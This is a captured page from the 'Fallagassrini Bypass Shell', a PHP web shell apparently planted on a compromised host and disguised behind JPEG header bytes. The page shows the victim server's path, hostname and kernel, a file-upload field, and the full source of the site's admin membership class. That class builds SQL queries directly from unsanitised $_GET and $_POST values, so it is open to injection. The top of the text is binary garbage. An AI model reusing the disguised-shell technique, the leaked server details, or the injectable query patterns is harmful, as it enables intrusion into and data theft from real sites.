JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/admin/includes/classes/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/admin/includes/classes/class.MembershipMgmt.php

<?php
#####Class For Adding Content Management ######
class MembershipMgmt extends MysqlFns{
 
 /* class constructor */
 function MembershipMgmt(){
 $this->LDDisplayPath= $config['SiteGlobalPath']."class.MembershipMgmt.php";
     global $objSmarty,$config;
	$tbl = $config['DBPrefix'];

  $this->MysqlFns();
  $this->Limit = 20;
   $this->Keyword = '';
  $this->Operator = '';
  $this->PerPage = '';
  
	
 }

 //Create FCK Editor
 function CreateFCKeditor($value = ''){
     global $objSmarty,$config;
	$tbl = $config['DBPrefix'];


  include($config['FckEditorPath'] . '/fckeditor.php');
  $sBasePath = $config['SiteFCKEditorBasePath'];

  $oFCKeditor 			= new FCKeditor('content') ;
  $oFCKeditor->BasePath	= $sBasePath ;
  $oFCKeditor->Width		= 600 ;
  $oFCKeditor->Height		= 450 ;
  $oFCKeditor->Value		= $value;
  $objSmarty->assign('Editor', $oFCKeditor->Create());
 }
 
 
 
 /* Insert the content for  Static Pages */
 
 function InsertMembership($objArray){
 	
      global $objSmarty,$config,$_POST;
	$tbl = $config['DBPrefix'];



   if(!$objArray['mPlan']){
    $objSmarty->assign('ErrorMessage', 'Membership Plan should not be blank');
	return false;
   }elseif(!$objArray['mPackage']){
    $objSmarty->assign('ErrorMessage', 'Membership Package should not be blank');
	return false;
   }elseif(!$objArray['bpVisit']){
    $objSmarty->assign('ErrorMessage', 'Book Per Visit should not be blank');
	return false;
   }elseif(!$objArray['deposit']){
    $objSmarty->assign('ErrorMessage', 'Deposit should not be blank');
	return false;
   }elseif(!$objArray['hLimit']){
    $objSmarty->assign('ErrorMessage', 'Hiring Limit should not be blank');
	return false;
   }elseif(!$objArray['delivery']){
    $objSmarty->assign('ErrorMessage', 'Delivery should not be blank');
	return false;
   }elseif(!$objArray['commands']){
    $objSmarty->assign('ErrorMessage', 'commands should not be blank');
	return false;
   }/*elseif(!preg_match("/^[0-9]{6}$/",$objArray['commands'])){
    $objSmarty->assign('ErrorMessage', 'commands should be numeric and 6 Digits');
	return false;
   }*/elseif(!$objArray['tConditions']){
    $objSmarty->assign('ErrorMessage', 'Terms and Conditions should not be blank');
	return false;
   }
  /* if($this->chk_previous_data($objArray))
   */
   
  // if($this->ChkDupliCust($objArray))
  // $objSmarty->assign('supplier_code', $objArray['mPlan']);
   if($objArray['mPlan']){
   $InsQuery = 'INSERT INTO `membership`(`membership_plan`,`m_package`,`book_per_visit`,`deposit`,`hiring_limit`, `delivery`, `command`,`terms_conditions`,`status`) VALUES("'.trim(addslashes($objArray['mPlan'])).'","'.trim(addslashes($objArray['mPackage'])).'","'.trim(addslashes($objArray['bpVisit'])).'","'.trim(addslashes($objArray['deposit'])).'","'.trim(addslashes($objArray['hLimit'])).'","'.trim(addslashes($objArray['delivery'])).'","'.trim(addslashes($objArray['commands'])).'","'.trim(addslashes($objArray['tConditions'])).'","1")';
  	 $this->ExecuteQuery($InsQuery, 'insert');
	// header('Location:' .$_SERVER['PHP_SELF'].'?server_response=success&supplier_code='.$objArray['mPlan'].'&window_action=true');
	


	$oFCKeditor->Value		= '';
	$objSmarty->assign('mPlan',$objArray['mPlan']);
	$objSmarty->assign('mPlan', '');
	$url_addtnal_data=base64_encode("New MembershipPlan Added Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?server_response=success&sm=".$url_addtnal_data."&supplier_id=".$objArray['mPlan']);
	//PrePopulate($objArray, 'CusDetail');
	  }
 }
 
  /* Edit the Static Page */
 function EditVendor($objArray){ 

     global $objSmarty,$config,$_POST;
	$tbl = $config['DBPrefix'];

 // $CusIdent=$_REQUEST['s_code'];
  $objSmarty->assign('Keyword', $this->Keyword);
  $objSmarty->assign('Operator', $this->Operator);
  $objSmarty->assign('Offset', $this->Offset);
  $objSmarty->assign('PerPage', $this->PerPage);
  
   if(!$objArray['mPlan']){
	$objSmarty->assign('ErrorMessage', 'Supplier Code should not be blank');
	return false;
   }/*elseif(!$objArray['hYearly']){
	$objSmarty->assign('ErrorMessage', 'Supplier Name should not be blank');
	return false;
   }*/elseif(!$objArray['annual']){
	$objSmarty->assign('ErrorMessage', 'vat No should not be blank');
	return false;
   }elseif(!$objArray['bpVisit']){
	$objSmarty->assign('ErrorMessage', 'ServiceTax No should not be blank');	
	return false;
   }elseif(!$objArray['hLimit']){
	$objSmarty->assign('ErrorMessage', 'hLimit should not be blank');	
	return false;
   }elseif(!$objArray['delivery']){
	$objSmarty->assign('ErrorMessage', 'delivery should not be blank');
	return false;
   }elseif(!$objArray['commands']){
	$objSmarty->assign('ErrorMessage', 'pin Code should not be blank');
	return false;
   }/*elseif(!preg_match("/^[0-9]{6}$/",$objArray['commands'])){
	$objSmarty->assign('ErrorMessage', 'Supplier Code should not be blank');
	return false;
   }*/elseif(!$objArray['tConditions']){
	$objSmarty->assign('ErrorMessage', 'pan No should not be blank');
	return false;
   }elseif(!$objArray['cstNo']){
	$objSmarty->assign('ErrorMessage', 'cst No should not be blank');	
	return false;
   }elseif(!$objArray['contactPerson']){
	$objSmarty->assign('ErrorMessage', 'contactPerson should not be blank');	
	return false;
   }/*elseif(!$objArray['company_name']){
	$objSmarty->assign('ErrorMessage', 'Company Name should not be blank');
	return false;
   }*/elseif(!$objArray['mobile']){
	$objSmarty->assign('ErrorMessage', 'mobile should not be blank');
	return false;
   }elseif(!$objArray['email']){
	$objSmarty->assign('ErrorMessage', 'email  should not be blank');
	return false;
   }/*elseif(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/", $objArray['email'])){
	$url_addtnal_data=base64_encode("Email is not valid");
    header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);		
	return false;
   }*/elseif(!$objArray['createdDate']){
	$objSmarty->assign('ErrorMessage', 'created Date should not be blank');
	return false;
   }elseif(!$objArray['createdTime']){
	$objSmarty->assign('ErrorMessage', 'created Time should not be blank');
	return false;
   } 
 /*  if($this->ChkDupliCust($objArray)) 
    $objSmarty->assign('s_code', $objArray['s_code']);
   if($objArray['s_code'] && $objArray['sname'])*/
   if($objArray['mPlan']){
  	$UpQuery = 'UPDATE `membership` SET `supplier_name` = "'.trim($objArray['hYearly']).'",`area` = "'.trim($objArray['area']).'",`vat_no` = "'.trim($objArray['annual']).'",`servicetax_no` = "'.trim($objArray['bpVisit']).'",`pan_no` = "'.trim($objArray['tConditions']).'",`cst_no` = "'.trim($objArray['cstNo']).'",`address` = "'.trim($objArray['address']).'", `address2` = "'.trim($objArray['address2']).'", `hLimit` = "'.trim($objArray['hLimit']).'", `delivery` = "'.trim($objArray['delivery']).'", `commands` = "'.trim($objArray['commands']).'", `contact_person` = "'.trim($objArray['contactPerson']).'",`mobile_no` = "'.trim($objArray['mobile']).'", `phone_no` = "'.trim(addslashes($objArray['phone'])).'", `email` = "'.trim(addslashes($objArray['email'])).'", `created_date` = "'.trim(addslashes($objArray['createdDate'])).'",`created_time` ="'.trim(addslashes($objArray['createdTime'])).'", `record_status` = "1" WHERE `supplier_code` ="'.trim($objArray['mPlan']).'"';
	$this->ExecuteQuery($UpQuery, 'update');
// header('Location:' .$_SERVER['PHP_SELF'].'?server_response=success&supplier_code='.$objArray['mPlan'].'&window_action=true');
 header('Location:' .$_SERVER['PHP_SELF'].'?supplier_code='.$_GET['supplier_code'].'&server_response=update success');	
	//$this->GetSupplierView($objArray);
	/*$url_addtnal_data=base64_encode("Supplier Details Updated Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
	return true;*/
}
   }
  
 /*}
  else 
 {
 
     $SelQuery2		= 'SELECT `supplier_name`,`address1`,`address2`,`hLimit`,`delivery`,`commands`,`contact_person`,`designation`,`mobile`,`phone`,`email`,`created_date` FROM `membership` WHERE `supplier_code` = "'.$objArray['s_code'].'"  Limit 0,1';
     $CusDetail		= $this->ExecuteQuery($SelQuery2, 'select');
 
     $SelQuery3		= 'SELECT `supplier_name`,`address1`,`address2`,`hLimit`,`delivery`,`commands`,`contact_person`,`designation`,`mobile`,`phone`,`email`,`created_date` FROM `membership` WHERE `supplier_name` = "'.$objArray['sname'].'" AND `address1` = "'.$objArray['address1'].'" AND `address2` = "'.$objArray['address2'].'" AND `hLimit` = "'.$objArray['hLimit'].'" AND `delivery` = "'.$objArray['delivery'].'" AND `commands` = "'.$objArray['commands'].'" AND `contact_person` = "'.$objArray['contactperson'].'" AND `designation` = "'.$objArray['designation'].'" AND  `mobile` = "'.$objArray['mobile'].'" AND `phone` = "'.$objArray['phone'].'" AND `email` = "'.$objArray['email'].'" AND `created_date` = "'.$objArray['cr_date'].'"  Limit 0,1';
  $CusDetail2		= $this->ExecuteQuery($SelQuery3, 'select');
  
  if($CusDetail==$CusDetail2)
  {
   $url_addtnal_data=base64_encode("Supplier Details Already Exists");
    header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
	return false;
  }
  else
  {
  
  
     	$UpQuery = 'UPDATE `membership` SET `supplier_name` = "'.trim($objArray['sname']).'",`vat_no` = "'.trim($objArray['vat_no']).'",`service_tax_no` = "'.trim($objArray['service_tax_no']).'",`pan_no` = "'.trim($objArray['pan_no']).'",`cst_no` = "'.trim($objArray['cst_no']).'",`address1` = "'.trim($objArray['address1']).'", `address2` = "'.trim($objArray['address2']).'", `hLimit` = "'.trim($objArray['hLimit']).'", `delivery` = "'.trim($objArray['delivery']).'", `commands` = "'.trim($objArray['commands']).'", `contact_person` = "'.trim($objArray['contactperson']).'", `designation` = "'.trim($objArray['designation']).'", `mobile` = "'.trim($objArray['mobile']).'", `phone` = "'.trim(addslashes($objArray['phone'])).'", `email` = "'.trim(addslashes($objArray['email'])).'", `created_date` = "'.trim(addslashes($objArray['cr_date'])).'",`created_time` ="'.trim(addslashes($objArray['crtime'])).'", `status` = "1" WHERE `supplier_code` ="'.trim($objArray['s_code']).'"';
	$this->ExecuteQuery($UpQuery, 'update');
  
  
  	$url_addtnal_data=base64_encode("Supplier Details Updated Successfully");

    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
	return true;
  }
  
 }
 
 }*/
 
 
 /* Validation for Static Pages */
 function ChkDupliCust($c_id){
  global $objSmarty;
  if(!empty($c_id))
  //echo $c_id;
 // $WhereClause	= ' AND `id` != '.$Ident;
 $SelQuery2		= 'SELECT * FROM `membership` WHERE `supplier_code` = "'.$c_id['cst_no'].'" Limit 0,1';
  $CusDetail		= $this->ExecuteQuery($SelQuery2, 'select');
  if(!empty($CusDetail) && is_array($CusDetail))
   return false;
  else
   return true;
 }
 
 
 function chk_previous_data($c_id){
  global $objSmarty;
  
  if(!empty($c_id))
 // $WhereClause	= ' AND `id` != '.$Ident;
  $SelQuery2		= 'SELECT * FROM `membership` WHERE `vat_no` = "'.$c_id['vat_no'].'" AND `record_status`=1 AND `supplier_code`!= "'.$c_id['s_code'].'"  AND `record_status`=1 AND `supplier_code`!= "'.$c_id['s_code'].'" AND `record_status`=1 AND `supplier_code`!= "'.$c_id['s_code'].'" OR `cst_no` = "'.$c_id['cst_no'].'" AND `record_status`=1 AND `supplier_code`!= "'.$c_id['s_code'].'"  Limit 0,1';
  $CusDetail		= $this->ExecuteQuery($SelQuery2, 'select');
  if(!empty($CusDetail) && is_array($CusDetail))
   return false;
  else
   return true;
 }
 
 
 /* Delete the Static Page */
 function DeleteID($id){
  global $objSmarty;
  $UpQuery1 = 'update `membership` set record_status ="0" WHERE `supplier_code`="'.$_GET['supplier_code'].'"';
$this->ExecuteQuery($UpQuery1, 'delete');
// header('Location:' .$_SERVER['PHP_SELF'].'?supplier_code='.$_GET['supplier_code'].'&server_response=update success');	
  header('Location:' .$_SERVER['PHP_SELF'].'?server_response=delete_success');
 }
 /*Roles list */
 function  GetMemberList()
 {
  global $objSmarty;
  $SelQuery2		= 'SELECT * FROM `membership` WHERE `status`=1';
  $MemDetail		= $this->ExecuteQuery($SelQuery2, 'select');
  $objSmarty->assign('MemDetail', $MemDetail);
  
 }
  
//Get Member Details 
 
  function GetMemberMgmt($objArray='')  
	{
		global $objSmarty;
		$SelQuery4 = 'SELECT * FROM `membership` WHERE sl_no ="'.$_GET['slno'].'" AND membership_plan="'.$_GET['name'].'" AND status="1"' ;
		$PageList2		= $this->ExecuteQuery($SelQuery4, "select");
        $objSmarty->assign('PageList2', $PageList2);
	}	
	//Get Member Details 
 
  function GetMemberEditMgmt($objArray='')  
	{
		global $objSmarty;
		$SelQuery4 = 'SELECT * FROM `membership` WHERE membership_plan="'.$_GET['plan'].'" AND m_package="'.$_GET['pack'].'" AND status="1"' ;
		$PageList3		= $this->ExecuteQuery($SelQuery4, "select");
        $objSmarty->assign('PageList3', $PageList3);
	}
	//Delete Plan List
 function DeleteplanList(){
   
   $SelQuery = 'UPDATE `membership` set status = "0" WHERE membership_plan = "'.$_GET['plan'].'" AND m_package="'.$_GET['pack'].'" ';
   $DList = $this->ExecuteQuery($SelQuery, "update");
    $url_addtnal_data=base64_encode("Plan Deleted Successfully");
   header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data);
  // $objSmarty->assign('DList',$DList);
   
 }
 function EditPlan($objArray)
 {

     global $objSmarty,$config,$_POST;
  
   if(!$objArray['m_package']){
	$objSmarty->assign('ErrorMessage', 'Package should not be blank');
	return false;
   }elseif(!$objArray['book_per_visit']){
	$objSmarty->assign('ErrorMessage', 'Book Per Visit should not be blank');
	return false;
   }elseif(!$objArray['deposit']){
	$objSmarty->assign('ErrorMessage', 'Deposit should not be blank');
	return false;
   }elseif(!$objArray['hiring_limit']){
	$objSmarty->assign('ErrorMessage', 'Hiring Limit should not be blank');	
	return false;
   }elseif(!$objArray['delivery']){
	$objSmarty->assign('ErrorMessage', 'Delivery should not be blank');
	return false;
   }elseif(!$objArray['tConditions']){
	$objSmarty->assign('ErrorMessage', 'Terms and Conditions should not be blank');
	return false;
   }
 /*  if($this->ChkDupliCust($objArray)) 
    $objSmarty->assign('s_code', $objArray['s_code']);
   if($objArray['s_code'] && $objArray['sname'])*/
   if($objArray['m_package']){
  	$UpQuery = 'UPDATE `membership` SET `m_package` = "'.trim($objArray['m_package']).'",`book_per_visit` = "'.trim($objArray['book_per_visit']).'",`deposit`="'.trim($objArray['deposit']).'",`hiring_limit` = "'.trim($objArray['hiring_limit']).'",`delivery` = "'.trim($objArray['delivery']).'",`command` = "'.trim($objArray['command']).'",`terms_conditions` = "'.trim($objArray['tConditions']).'",`status` = "1" WHERE `membership_plan` ="'.$_GET['plan'].'" AND m_package="'.$_GET['pack'].'"';
	$this->ExecuteQuery($UpQuery, 'update');
// header('Location:' .$_SERVER['PHP_SELF'].'?server_response=success&supplier_code='.$objArray['supplierCode'].'&window_action=true');
 header('Location:' .$_SERVER['PHP_SELF'].'?plan='.$_GET['plan'].'&pack='.$objArray['m_package'].'&server_response=update success');	
	//$this->GetSupplierView($objArray);
	/*$url_addtnal_data=base64_encode("Supplier Details Updated Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
	return true;*/
}
   
 }
 
 function onlineRegisteredUsers()
	{
	    	global $objSmarty;
		$SelQuery = 'SELECT online_registered_users.*,branches.name AS branchName FROM `online_registered_users`,branches WHERE  branches.id=online_registered_users.branch_id ORDER BY timestamp DESC' ;
		$onlineRegisterUserList		= $this->ExecuteQuery($SelQuery, "select");
        $objSmarty->assign('onlineRegisterUserList', $onlineRegisterUserList);
	}
	
	function registeredUsersView()
	{
	    global $objSmarty;
	    $SelQuery= 'SELECT online_registered_users.*,branches.name AS branchName FROM `online_registered_users`,branches WHERE  branches.id=online_registered_users.branch_id AND sl_no="'.$_GET['o_id'].'" ';
	    $registerUserView = $this->ExecuteQuery($SelQuery, "select");
	    $objSmarty->assign('registerUserView', $registerUserView);
	}
	
	function EditMember($objArray='')
	{
	   // echo "hi";exit;
	    if($_GET['o_id']){
       $UpQuery = 'UPDATE `online_registered_users` SET `reg_status` ="'.trim($objArray['reg_status']).'",reg_remarks="'.$_POST['remarks'].'" WHERE sl_no="'.$_GET['o_id'].'"';
	$this->ExecuteQuery($UpQuery, 'update');
// header('Location:' .$_SERVER['PHP_SELF'].'?server_response=success&supplier_code='.$objArray['supplierCode'].'&window_action=true');
 header('Location:memberList.php?o_id='.$_GET['o_id'].'&regStatus=updated');	
	//$this->GetSupplierView($objArray);
	/*$url_addtnal_data=base64_encode("Supplier Details Updated Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
	return true;*/
}
   
 }
	}
  

?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net